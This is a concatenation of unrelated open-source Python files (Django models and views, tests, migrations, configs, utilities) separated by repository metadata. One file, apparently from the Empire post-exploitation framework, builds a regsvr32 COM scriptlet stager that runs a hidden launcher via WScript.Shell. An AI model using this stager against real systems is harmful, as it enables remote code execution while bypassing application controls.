return u'%s: %s' % (self.name, self.value)
class OptionalNamedProperty(models.Model):
name = models.CharField(_("name"), max_length=200, blank=True)
class Meta:
abstract = True
def __unicode__(self):
return u'%s%s' % (self.name and '%s: ' % self.name or "", self.value)
# Contact properties
class PrimaryPropertyDescriptor(object):
def __init__(self, collection_name):
self.collection_name = collection_name
def get_collection(self, instance):
return getattr(instance, self.collection_name)
def __get__(self, instance, owner):
if instance is None:
return self
return self.get_collection(instance).primary()
def __set__(self, instance, value):
value.is_primary = True
self.get_collection(instance).add(value)
def __delete__(self, instance):
self.get_collection(instance).primary().delete()
for obj in self.get_collection(instance).all():
obj.is_primary = True
return
class CustomField(ContactProperty, NamedProperty):
contact = models.ForeignKey('Contact', related_name="custom_fields")
value = models.TextField(_("value"))
def __unicode__(self):
return u'%s: %s' % (self.name, self.value)
class Date(ContactProperty, NamedProperty):
contact = models.ForeignKey('Contact', related_name="dates")
value = models.DateField(_("date"))
class Meta:
verbose_name = _("date")
verbose_name_plural = _("dates")
class EmailAddress(PrimaryProperty, LabeledProperty, OptionalNamedProperty):
contact = models.ForeignKey('Contact', related_name="email_addresses")
value = models.EmailField(_("address"))
class Meta:
verbose_name = _("email address")
verbose_name_plural = _("email addresses")
class IMAccount(PrimaryProperty):
contact = models.ForeignKey('Contact', related_name="im_accounts")
service = models.CharField(_("service"), max_length=30, choices=IM_SERVICES)
account = models.CharField(_("account"), help_text=_("user name or email address"), max_length=200)
class Meta:
verbose_name = _("IM account")
verbose_name_plural = _("IM accounts")
@property
def value(self):
return self.account
class Link(ContactProperty, NamedProperty):
contact = models.ForeignKey('Contact', related_name="links")
value = models.URLField(_('URL'), max_length=200, default='http://')
class Meta:
verbose_name = _("link")
verbose_name_plural = _("links")
def save(self, *args, **kwargs):
if self.value == 'http://':
return
super(Link, self).save(*args, **kwargs)
class Organization(PrimaryProperty):
contact = models.ForeignKey('Contact', related_name="organizations")
name = models.CharField(_("name"), max_length=200)
title = models.CharField(_("title"), max_length=200, blank=True)
class Meta:
verbose_name = _("organization")
verbose_name_plural = _("organizations")
def __unicode__(self):
return self.name
class PhoneNumber(PrimaryProperty, OptionalNamedProperty):
PHONE_NUM_LABELS = (
('landline', _('landline')),
('mobile', _('mobile')),
('fax', _('fax')),
)
contact = models.ForeignKey('Contact', related_name="phone_numbers")
label = models.CharField(_("label"), max_length=200, choices=PHONE_NUM_LABELS)
value = models.CharField(_('number'), max_length=100)
class Meta:
verbose_name = _("phone number")
verbose_name_plural = _("phone numbers")
def __unicode__(self):
return u'%s%s [%s]' % (self.name and "%s: " % self.name or "",
self.value, PhoneNumber.get_label_display(self))
class PostalAddress(PrimaryProperty, LabeledProperty):
contact = models.ForeignKey('Contact', related_name="postal_addresses")
address1 = models.CharField(_("address line 1"), max_length=127, blank=False)
address2 = models.CharField(_("address line 2"), max_length=127, blank=True)
city = models.CharField(_("city"), max_length=127, blank=True)
state = models.CharField(_("state/province/region"), max_length=127, blank=True)
country = models.CharField(_("country"), max_length=127)
postcode = models.CharField(_("postal code/zip code"), max_length=31, blank=True)
class Meta:
verbose_name = _("postal address")
verbose_name_plural = _("postal addresses")
@property
def value(self):
data = [self.address1, self.address2, self.city,
self.state, self.country, self.postcode]
return ", ".join([i for i in data if i])
class Contact(models.Model):
""" A person or company.
"""
name = models.CharField(max_length=200)
is_company = models.BooleanField(_("company"), default=False)
photo = models.ImageField(_("photo"), upload_to='var/addressbook/photos', blank=True)
notes = models.TextField(_("notes"), blank=True)
date_created = models.DateTimeField(auto_now_add=True, editable=False)
date_updated = models.DateTimeField(auto_now=True, editable=False)
class Meta:
verbose_name = _("contact")
verbose_name_plural = _("contacts")
ordering = ('name',)
def __unicode__(self):
return self.name
# primary contact properies
email_address = PrimaryPropertyDescriptor('email_addresses')
im_account = PrimaryPropertyDescriptor('im_accounts')
company = PrimaryPropertyDescriptor('organizations')
phone_number = PrimaryPropertyDescriptor('phone_numbers')
postal_address = PrimaryPropertyDescriptor('postal_addresses')
@property
def address(self):
return self.postal_address
class Group(models.Model):
name = models.CharField(max_length=200, unique=True)
description = models.TextField(_("description"), blank=True)
members = models.ManyToManyField(Contact, verbose_name=_("members"), blank=True)
class Meta:
verbose_name = _("group")
verbose_name_plural = _("groups")
@property
def member_list(self):
return ', '.join([str(c) for c in self.members.all()[:5]])
def __unicode__(self):
return self.name
|
Saviq/django-addressbook
|
addressbook/models.py
|
Python
|
bsd-3-clause
| 8,986
|
from django.views.generic.list import ListView
from pari.article.common import get_result_types
from .models import get_search_results
class SearchList(ListView):
context_object_name = "results"
template_name = 'search/search_list.html'
def get_queryset(self):
query = self.request.GET.get("query")
filter = self.request.GET.get("filter")
page = self.request.GET.get("page", 1)
return get_search_results(query, filter, page)
def get_context_data(self, **kwargs):
context = super(SearchList, self).get_context_data(**kwargs)
filter = self.request.GET.get('filter')
context['filter'] = filter
context['result_types'] = get_result_types(filter)
context['query'] = self.request.GET.get('query')
return context
|
RuralIndia/pari
|
pari/search/views.py
|
Python
|
bsd-3-clause
| 808
|
'''
Created on Apr 25, 2014
@author: sstober
'''
import os;
import sys;
import logging;
log = logging.getLogger(__name__);
from deepthought.experiments.ismir2014.util import load_config;
from deepthought.util.config_util import merge_params;
from deepthought.experiments.ismir2014.train_convnet import train_convnet
# from deepthought.experiments.ismir2014.plot import plot2;
# from concurrent.futures import ThreadPoolExecutor;
# NOTE: ProcessPoolExecutor does not work with GPU / CUDA
def dummy():
for x in xrange(10000):
x**x;
log.info('done');
def run(params):
try:
log.debug('running {}'.format(params.experiment_root));
# dummy();
train_convnet(params);
# plot2(config.experiment_root);
except:
log.fatal("Unexpected error:", sys.exc_info());
if __name__ == '__main__':
config = load_config(default_config=
os.path.join(os.path.dirname(__file__),'train_fftconvnet.cfg'), reset_logging=True);
lr_values = config.get('lr_values', [0.001, 0.0033, 0.01, 0.00033, 0.033, 0.1]);
beat_patterns = config.get('beat_patterns', [10,20,30]);
bar_patterns = config.get('bar_patterns', [10,20,30]);
beat_pools = config.get('beat_pools', [1,3,5]);
bar_pools = config.get('bar_pools', [1,3,5]);
# with ThreadPoolExecutor(max_workers=config.num_processes) as executor:
for lr in lr_values:
for h1pat in bar_patterns:
for h1pool in bar_pools:
for h0pat in beat_patterns:
for h0pool in beat_pools:
# collect params
exp_str = 'lr{}/h1pool{}/h1pat{}/h0pool{}/h0pat{}'.format(lr,h1pool,h1pat,h0pool,h0pat);
hyper_params = {
'experiment_root' : os.path.join(config.experiment_root, exp_str),
'learning_rate' : lr,
'beat_pool_size' : h0pool,
'num_beat_patterns' : h0pat,
'bar_pool_size' : h1pool,
'num_bar_patterns' : h1pat,
};
params = merge_params(config, hyper_params);
# check if directory already exists
if os.path.exists(os.path.join(params.experiment_root, 'epochs')):
print 'Already done: '+params.experiment_root;
continue;
# executor.submit(run, params);
run(params);
|
sstober/deepthought
|
deepthought/experiments/ismir2014/hyper_search_cnn.py
|
Python
|
bsd-3-clause
| 2,756
|
"""Utility functions"""
from datetime import datetime
from uuid import uuid4
import pytz
def create_message_structure(content, sender, message_type):
"""
Creates a message dictionary
Args:
content (str): a string representing a message
sender (str): a string representing the sender
message_type (str): a string representing the message type
Returns:
tuple: a tuple containing a dictionary of the infos about a chat message
and a datatime object
"""
raw_timestamp = datetime.now(tz=pytz.UTC)
message = {
'id': uuid4().hex,
'content': content,
'timestamp': raw_timestamp.isoformat(),
'sender': sender,
'message_type': message_type,
}
return message, raw_timestamp
def create_user_message(content, sender):
"""
Shortcut for create_message_structure user messages
Args:
content (str): a string representing a message
sender (str): a string representing the sender
Returns:
tuple: a tuple containing a dictionary of the infos about a chat message
and a datatime object
"""
return create_message_structure(content, sender, message_type='user_message')
def create_system_message(content):
"""
Shortcut for create_message_structure user messages
Args:
content (str): a string representing a message
Returns:
tuple: a tuple containing a dictionary of the infos about a chat message
and a datatime object
"""
return create_message_structure(content, sender='system', message_type='notification')
def serialize_pagination(pagination_obj):
"""
Returns a dictionary of serialized sqalchemy pagination object.
Args:
pagination_obj (flask.ext.sqlalchemy.Pagination): a pagination object
Returns:
dict: the serialization of the pagination object
"""
return {
'items': [item.to_json() for item in pagination_obj.items],
'current_page': pagination_obj.page,
'next_page': pagination_obj.next_num,
'prev_page': pagination_obj.prev_num,
'total_pages': pagination_obj.pages,
'total_number_items': pagination_obj.total,
}
|
giocalitri/calichat
|
calichat/utils.py
|
Python
|
bsd-3-clause
| 2,241
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.contrib.auth import get_user_model
from django.test import TestCase
from example.models import Customer
class UserManagerTest(TestCase):
user_email = 'user@example.com'
user_password = 'pa$sw0Rd'
def test_create_user(self):
user = get_user_model().objects.create_user(self.user_email)
self.assertEqual(user.email, self.user_email)
self.assertFalse(user.has_usable_password())
self.assertTrue(user.is_active)
self.assertFalse(user.is_staff)
self.assertFalse(user.is_superuser)
def test_create_superuser(self):
user = get_user_model().objects.create_superuser(
self.user_email, self.user_password)
self.assertEqual(user.email, self.user_email)
self.assertTrue(user.check_password, self.user_password)
self.assertTrue(user.is_active)
self.assertTrue(user.is_staff)
self.assertTrue(user.is_superuser)
def test_inactive_user_creation(self):
# Create deactivated user
user = get_user_model().objects.create_user(
self.user_email, self.user_password, is_active=False)
self.assertFalse(user.is_active)
def test_staff_user_creation(self):
# Create staff user
user = get_user_model().objects.create_user(
self.user_email, self.user_password, is_staff=True)
self.assertTrue(user.is_staff)
def test_empty_username(self):
self.assertRaises(ValueError, get_user_model().objects.create_user, email='')
def test_automatic_downcasting_of_inherited_user_models(self):
get_user_model().objects.create_superuser(
self.user_email, self.user_password)
Customer.objects.create_user('customer@example.com', 'cu$t0meR')
self.assertQuerysetEqual(
get_user_model().objects.all(),
['<User: user@example.com>', '<Customer: customer@example.com>'], ordered=False)
|
mishbahr/django-users2
|
tests/test_managers.py
|
Python
|
bsd-3-clause
| 1,983
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'TaskHistory.db_id'
db.delete_column(u'notification_taskhistory', 'db_id_id')
def backwards(self, orm):
# Adding field 'TaskHistory.db_id'
db.add_column(u'notification_taskhistory', 'db_id',
self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'database', null=True, to=orm['logical.Database'], on_delete=models.SET_NULL, blank=True),
keep_default=False)
models = {
u'notification.taskhistory': {
'Meta': {'object_name': 'TaskHistory'},
'arguments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'context': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'ended_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'task_id': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'task_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'task_status': ('django.db.models.fields.CharField', [], {'default': "u'PENDING'", 'max_length': '100', 'db_index': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['notification']
|
globocom/database-as-a-service
|
dbaas/notification/migrations/0007_auto__del_field_taskhistory_db_id.py
|
Python
|
bsd-3-clause
| 2,089
|
# -*- coding: UTF-8 -*-
from django.http import HttpResponse, HttpResponseRedirect
from datetime import datetime, date
from apps.seguridad.decorators import login_required, credential_required
from apps.seguridad.models import Usuario, Perfil
from apps.registro.models.Establecimiento import Establecimiento
import csv
from apps.reportes.models import Reporte
@login_required
@credential_required('reg_establecimiento_consulta')
def establecimientos(request, q):
filename = 'establecimientos_' + str(date.today()) + '.xls'
reporte = Reporte(headers=['REGION', 'JURISDICCIÓN', 'CUE', 'DEPENDENCIA FUNCIONAL', 'NOMBRE', 'DEPARTAMENTO', 'LOCALIDAD', 'ESTADO', 'VERIFICADO'], filename=filename)
for est in q:
try:
localidad = est.get_first_domicilio().localidad
departamento = localidad.departamento.nombre
localidad = localidad.nombre
except AttributeError:
localidad = ''
departamento = ''
if est.estado is None:
estado_nombre = ''
else:
estado_nombre = est.estado.nombre.encode('utf8')
reporte.rows.append([est.dependencia_funcional.jurisdiccion.region.nombre.encode('utf8'), est.dependencia_funcional.jurisdiccion.nombre.encode('utf8'),\
est.cue, est.dependencia_funcional.nombre.encode('utf8'), est.nombre.encode('utf8'), departamento.encode('utf8'), localidad.encode('utf8'), estado_nombre,
"SI" if est.verificado() else "NO"])
return reporte.as_csv()
|
MERegistro/meregistro
|
meregistro/apps/reportes/views/establecimiento.py
|
Python
|
bsd-3-clause
| 1,400
|
from nose.tools import assert_true, assert_false, assert_equals
from pygow import validation, maybe
def multBy(x):
def k(y):
return x * y
return k
def divBy(x):
def k(y):
if (x == 0):
return validation.Invalid(['doh'])
else:
return validation.Valid(y / x)
return k
def test_eq():
assert_true(validation.Valid(42).__eq__(validation.Valid(42)))
assert_false(validation.Valid(42).__eq__(validation.Valid(1)))
assert_true(validation.Invalid(['doh']).__eq__(validation.Invalid(['doh'])))
assert_false(validation.Valid(42).__eq__(validation.Invalid(['doh'])))
def test_ne():
assert_false(validation.Valid(42).__ne__(validation.Valid(42)))
assert_true(validation.Valid(42).__ne__(validation.Valid(1)))
assert_false(validation.Invalid(['doh']).__ne__(validation.Invalid(['doh'])))
assert_true(validation.Valid(42).__ne__(validation.Invalid(['doh'])))
def test_str():
assert_equals('Valid(42)', str(validation.Valid(42)))
assert_equals('Invalid([\'doh\'])', str(validation.Invalid(['doh'])))
def test_is_valid():
assert_true(validation.Valid(42).is_valid())
assert_false(validation.Invalid(['doh']).is_valid())
def test_map():
assert_equals(validation.Valid(42), validation.Valid(6).map(multBy(7)))
assert_equals(validation.Invalid(['doh']), validation.Invalid(['doh']).map(multBy(7)))
def test_flat_map():
assert_equals(validation.Valid(6), validation.Valid(42).flat_map(divBy(7)))
assert_equals(validation.Invalid(['doh']), validation.Invalid(['doh']).flat_map(divBy(7)))
def test_get_required_env():
assert_true(validation.get_required_env('HOME').is_valid())
assert_false(validation.get_required_env('THIS_AINT_AN_ENV_VAR').is_valid())
def test_to_maybe():
assert_equals(maybe.Just(42), validation.Valid(42).to_maybe())
assert_equals(maybe.Nothing(), validation.Invalid(['nope']).to_maybe())
a_v = validation.Valid('a')
a_i = validation.Invalid(['invalid: a'])
def test_lift_a():
def append(a):
return a
assert_equals(
validation.Valid('a'),
validation.lift_a(append).ap(a_v)
)
b_v = validation.Valid('b')
b_i = validation.Invalid(['invalid: b'])
def test_lift_a2():
def append_2(a, b):
return a + b
assert_equals(
validation.Valid('ab'),
validation.lift_a2(append_2).ap(a_v).ap(b_v)
)
assert_equals(
validation.Invalid(['invalid: a']),
validation.lift_a2(append_2).ap(a_i).ap(b_v)
)
assert_equals(
validation.Invalid(['invalid: b']),
validation.lift_a2(append_2).ap(a_v).ap(b_i)
)
assert_equals(
validation.Invalid(['invalid: a', 'invalid: b']),
validation.lift_a2(append_2).ap(a_i).ap(b_i)
)
c_v = validation.Valid('c')
def test_lift_a3():
def append_3(a, b, c):
return a + b + c
assert_equals(
validation.Valid('abc'),
validation.lift_a3(append_3).ap(a_v).ap(b_v).ap(c_v)
)
def test_lift_a4():
def append_4(a, b, c, d):
return a + b + c + d
assert_equals(
validation.Valid('abca'),
validation.lift_aN(4, append_4).ap(a_v).ap(b_v).ap(c_v).
ap(a_v)
)
def test_lift_a9():
def append_9(a, b, c, d, e, f, g, h, i):
return a + b + c + d + e + f + g + h + i
assert_equals(
validation.Valid('abcabcabc'),
validation.lift_aN(9, append_9).ap(a_v).ap(b_v).ap(c_v).
ap(a_v).ap(b_v).ap(c_v).
ap(a_v).ap(b_v).ap(c_v)
)
def test_lift_a0():
def append(a):
return a
assert_equals(
validation.Invalid(["n must be positive in lift_aN(n, f)"]),
validation.lift_aN(0, append).ap(a_v)
)
|
udacity/pygow
|
tests/test_validation.py
|
Python
|
bsd-3-clause
| 3,827
|
import os
import production_settings
BASEDIR = os.path.abspath(os.path.dirname(__file__))
class Config:
DEBUG = False
TESTING = False
SECRET_KEY = 'im!mx2m(69)b^7n3j!yi)k!a7n(^09=^&*+pnan78hl^%_yp4u'
CSRF = True
CSRF_SECRET = 'im!mx2m(69)b^7n3j!yi)k!a7n(^09=^&*+pnan78hl^%_yp4u'
JSONIFY_PRETTYPRINT_REGULAR = False
UPLOAD_FOLDER = os.path.join(BASEDIR, 'media')
IMG_MIMES = {
'image/jpeg',
'image/png',
'image/gif',
}
DOC_MIMES = {
'application/vnd.openxmlformats-officedocument'
'.wordprocessingml.document', # .docx
'application/msword', # .doc
'application/pdf', # .pdf
'text/plain', # .txt
'application/vnd.openxmlformats-officedocument'
'.presentationml.presentation', # .pptx
'application/vnd.ms-powerpoint', # .ppt
'application/rtf', # .rtf
}
ALLOWED_MIMES = IMG_MIMES | DOC_MIMES
MAX_CONTENT_LENGTH = 15 * 1024 * 1024
FIXTURES_DIR = os.path.join(BASEDIR, 'fixtures')
# Celery
CELERY_IMPORTS = (
"project.tasks.mail",
"project.tasks.uploads",
)
CELERY_BROKER_URL = 'redis://localhost:6379/0'
CELERY_BACKEND_URL = CELERY_BROKER_URL
# Email
MAIL_SERVER = 'smtp.yandex.ru'
MAIL_PORT = 465
MAIL_USE_SSL = True
MAILS_TO_SEND = ['hrportal@yandex.ru']
MAIL_USERNAME = 'hrportal@yandex.ru'
MAIL_PASSWORD = 'useaverystrongpasswordLuke'
MAIL_DEFAULT_SENDER = 'hrportal@yandex.ru'
# Logger configuration
LOG_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'detailed',
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'level': 'INFO',
'formatter': 'detailed',
'filename': '/tmp/junk.log',
'mode': 'a',
'maxBytes': 10485760,
'backupCount': 5,
},
},
'formatters': {
'detailed': {
'format': '%(asctime)s %(module)-17s line:%(lineno)-4d '
'%(levelname)-8s %(message)s',
},
'email': {
'format': 'Timestamp: %(asctime)s\nModule: %(module)s\n'
'Line: %(lineno)d\nMessage: %(message)s',
},
},
'loggers': {
'extensive': {
'level': 'DEBUG',
'handlers': [
'file',
],
},
},
'root': {
'level': 'INFO',
'handlers': [
'console',
]
}
}
class ProductionConfig(Config):
# Database
SQLALCHEMY_DATABASE_URI = production_settings.SQLALCHEMY_DATABASE_URI
UPLOAD_FOLDER = production_settings.UPLOAD_FOLDER
# Celery
CELERY_BROKER_URL = production_settings.CELERY_BROKER_URL
CELERY_BACKEND_URL = production_settings.CELERY_BACKEND_URL
# Email
MAIL_SERVER = production_settings.MAIL_SERVER
MAIL_PORT = production_settings.MAIL_PORT
MAIL_USE_SSL = production_settings.MAIL_USE_SSL
MAIL_USERNAME = getattr(production_settings, "MAIL_USERNAME", None)
MAIL_PASSWORD = getattr(production_settings, "MAIL_PASSWORD", None)
MAIL_DEFAULT_SENDER = production_settings.MAIL_DEFAULT_SENDER
class DevelopmentConfig(Config):
# Flask
DEBUG = True
DEVELOPMENT = True
SQLALCHEMY_ECHO = True
# Database
SQLALCHEMY_DATABASE_URI = 'postgresql://root:qwerty@localhost/hrportal'
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite://'
|
saklar13/Meowth
|
config.py
|
Python
|
bsd-3-clause
| 3,882
|
SIZEOF_DOUBLE = 8
ONE_MIB = 1048576
NC = 4080
MY_NC = 2040
LC = 256
MY_KC = 252
KC = 256
MC = 72
MR = 6
NR = 8
def panel_matrix_entries(dim, other_dim, panel_dim):
n_panels = dim // panel_dim
if n_panels * panel_dim < dim:
n_panels += 1
return (n_panels + 1) * panel_dim * other_dim
def memory_mine(m, n, k, l, nc=MY_NC, kc=MY_KC,
lc=LC, mc=MC,
mr=MR, nr=NR):
tmp_matrix = panel_matrix_entries(min(n, nc), min(k, kc), nr)
outer_l2 = panel_matrix_entries(min(m, mc), min(k, kc), mr)
inner_l3 = panel_matrix_entries(min(n, nc), min(l, lc), nr)
inner_l2 = panel_matrix_entries(min(k, mc), min(l, lc), mr)
kernels = 2 * mr * nr
total_allocs = tmp_matrix + outer_l2 + inner_l3 + inner_l2 + kernels
return (total_allocs * SIZEOF_DOUBLE) / ONE_MIB
def memory_goto(m, n, k, l, nc=NC, kc=KC, mc=MC, mr=MR, nr=NR):
tmp_matrix = k * n
outer_l3 = panel_matrix_entries(min(n, nc), min(k, kc), nr)
outer_l2 = panel_matrix_entries(min(m, mc), min(k, kc), mr)
inner_l3 = panel_matrix_entries(min(n, nc), min(l, kc), nr)
inner_l2 = panel_matrix_entries(min(k, mc), min(l, kc), mr)
kernels = 2 * mr * nr
total_allocs = (tmp_matrix + outer_l3 + outer_l2
+ inner_l3 + inner_l2 + kernels)
return (total_allocs * SIZEOF_DOUBLE) / ONE_MIB
|
krzysz00/momms
|
results/memory_usage.py
|
Python
|
bsd-3-clause
| 1,355
|
"""Creates the guests table
Revision ID: 38dbe9301b4c
Revises: 6451c45cc96d
Create Date: 2016-04-21 09:38:28.846577
"""
# revision identifiers, used by Alembic.
revision = '38dbe9301b4c'
down_revision = '6451c45cc96d'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('guests',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('host_id', sa.Integer(), nullable=False),
sa.Column('party_id', sa.Integer(), nullable=False),
sa.Column('is_at_party', sa.Boolean(), nullable=False),
sa.ForeignKeyConstraint(['host_id'], ['users.id'], ),
sa.ForeignKeyConstraint(['party_id'], ['parties.id'], ),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('guests')
### end Alembic commands ###
|
Rdbaker/WPI-IFC
|
migrations/versions/38dbe9301b4c_.py
|
Python
|
bsd-3-clause
| 1,001
|
from optparse import make_option
from django.core.management.base import LabelCommand
class Command(LabelCommand):
help = "Generate Sphinx documentation skeleton for given models."
option_list = LabelCommand.option_list + (
make_option('--locale', '-l', default=None, dest='locale',
help='Activate given locale, verbose names for models and' +
'attributes will be in given locale. '),
)
def handle_label(self, label, **options):
locale = options.get('locale', None)
if locale:
from django.utils import translation
translation.activate(locale)
from django.db import models
from simpleadmindoc.util import get_model
from simpleadmindoc.generate import model_doc
print model_doc(get_model(*label.split('.')))
|
bmihelac/django-simpleadmindoc
|
simpleadmindoc/management/commands/docgenmodel.py
|
Python
|
bsd-3-clause
| 849
|
from unittest import mock
from bfg9000.builtins.install import installify
from bfg9000.path import Root
from .. import *
class MockInstallOutputs:
class Mapping:
def __init__(self, env=None, bad=set()):
self.env = env
self.bad = bad
def __getitem__(self, key):
if key.path.root == Root.absolute or key in self.bad:
raise KeyError(key)
return installify(key, cross=self.env)
def __init__(self, env, bad=set()):
self.host = self.Mapping(bad)
self.target = self.Mapping(env, bad)
class ToolTestCase(CrossPlatformTestCase):
def __init__(self, *args, **kwargs):
super().__init__(clear_variables=True, *args, **kwargs)
def setUp(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.tool = self.tool_type(self.env)
|
jimporter/bfg9000
|
test/unit/tools/__init__.py
|
Python
|
bsd-3-clause
| 882
|
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'regsvr32',
'Author': ['@subTee', '@enigma0x3'],
'Description': ('Generates an sct file (COM Scriptlet) Host this anywhere'),
'Comments': [
'On the endpoint simply launch regsvr32 /u /n /s /i:http://server/file.sct scrobj.dll '
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True'
},
'OutFile': {
'Description': 'File to output SCT to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/launcher.sct'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
listenerName = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(
listenerName, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
code = "<?XML version=\"1.0\"?>\n"
code += "<scriptlet>\n"
code += "<registration\n"
code += "description=\"Win32COMDebug\"\n"
code += "progid=\"Win32COMDebug\"\n"
code += "version=\"1.00\"\n"
code += "classid=\"{AAAA1111-0000-0000-0000-0000FEEDACDC}\"\n"
code += " >\n"
code += " <script language=\"JScript\">\n"
code += " <![CDATA[\n"
code += " var r = new ActiveXObject(\"WScript.Shell\").Run(\"" + launcher + "\",0);\n"
code += " ]]>\n"
code += " </script>\n"
code += "</registration>\n"
code += "<public>\n"
code += " <method name=\"Exec\"></method>\n"
code += "</public>\n"
code += "</scriptlet>\n"
return code
|
pierce403/EmpirePanel
|
lib/stagers/launcher_sct.py
|
Python
|
bsd-3-clause
| 4,194
|
#
# ------------------------------------------------------------
# Copyright (c) All rights reserved
# SiLab, Institute of Physics, University of Bonn
# ------------------------------------------------------------
#
import logging
from basil.TL.TransferLayer import TransferLayer
from sensirion_shdlc_driver import ShdlcSerialPort, ShdlcConnection
from sensirion_shdlc_sensorbridge import SensorBridgePort, SensorBridgeShdlcDevice
from sensirion_shdlc_sensorbridge.device_errors import SensorBridgeI2cTimeoutError
TimeoutError = SensorBridgeI2cTimeoutError
# Requires 'sensirion_shdlc_sensorbridge'
logger = logging.getLogger(__name__)
class SensirionSensorBridge(TransferLayer):
'''
Driver for Sensirion Sensor Bridge using the official SHDLC drivers of Sensirion.
The Sensirion Sensor Bridge is connected via USB and allows communication to two I2C ports.
'''
bridge_ports = {
"one": SensorBridgePort.ONE,
"two": SensorBridgePort.TWO,
"all": SensorBridgePort.ALL,
}
def __init__(self, conf):
super(SensirionSensorBridge, self).__init__(conf)
def init(self):
super(SensirionSensorBridge, self).init()
self.port = self._init['port']
self.baudrate = self._init.get('baudrate', 460800)
self.ser = ShdlcSerialPort(port=self.port, baudrate=self.baudrate)
def setup_i2c_device(self, bridge_port=SensorBridgePort.ONE, voltage=3.3, frequency=400e3, **_):
device = SensorBridgeShdlcDevice(ShdlcConnection(self.ser), slave_address=0)
device.set_i2c_frequency(bridge_port, frequency=frequency)
device.set_supply_voltage(bridge_port, voltage=voltage)
device.switch_supply_on(bridge_port)
return device
def disable_i2c_device(self, device, bridge_port=SensorBridgePort.ONE):
if hasattr(self, 'device'):
device.switch_supply_off(bridge_port)
def print_i2c_device_information(self, device):
logger.info("Product Name: {}".format(device.get_product_name()))
logger.info("Product Type: {}".format(device.get_product_type()))
logger.info("Serial Number: {}".format(device.get_serial_number()))
logger.info("Version: {}".format(device.get_version()))
def read_i2c(self, device, port, address, command, read_n_bytes=0, timeout_us=100e3):
rx_data = device.transceive_i2c(port, address=address, tx_data=command,
rx_length=read_n_bytes, timeout_us=timeout_us)
return rx_data
def write_i2c(self, device, port, address, command):
device.transceive_i2c(port, address=address,
rx_length=0, tx_data=command, timeout_us=0)
def __del__(self):
self.close()
def close(self):
super(SensirionSensorBridge, self).close()
if hasattr(self, 'ser'):
self.ser.close()
|
SiLab-Bonn/basil
|
basil/TL/SensirionSensorBridge.py
|
Python
|
bsd-3-clause
| 2,893
|
#!/usr/bin/python
"""
Copyright 2013 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Repackage expected/actual GM results as needed by our HTML rebaseline viewer.
"""
# System-level imports
import argparse
import fnmatch
import json
import logging
import os
import re
import sys
import time
# Imports from within Skia
#
# We need to add the 'gm' directory, so that we can import gm_json.py within
# that directory. That script allows us to parse the actual-results.json file
# written out by the GM tool.
# Make sure that the 'gm' dir is in the PYTHONPATH, but add it at the *end*
# so any dirs that are already in the PYTHONPATH will be preferred.
PARENT_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
GM_DIRECTORY = os.path.dirname(PARENT_DIRECTORY)
if GM_DIRECTORY not in sys.path:
sys.path.append(GM_DIRECTORY)
import gm_json
import imagediffdb
IMAGE_FILENAME_RE = re.compile(gm_json.IMAGE_FILENAME_PATTERN)
IMAGE_FILENAME_FORMATTER = '%s_%s.png' # pass in (testname, config)
FIELDS_PASSED_THRU_VERBATIM = [
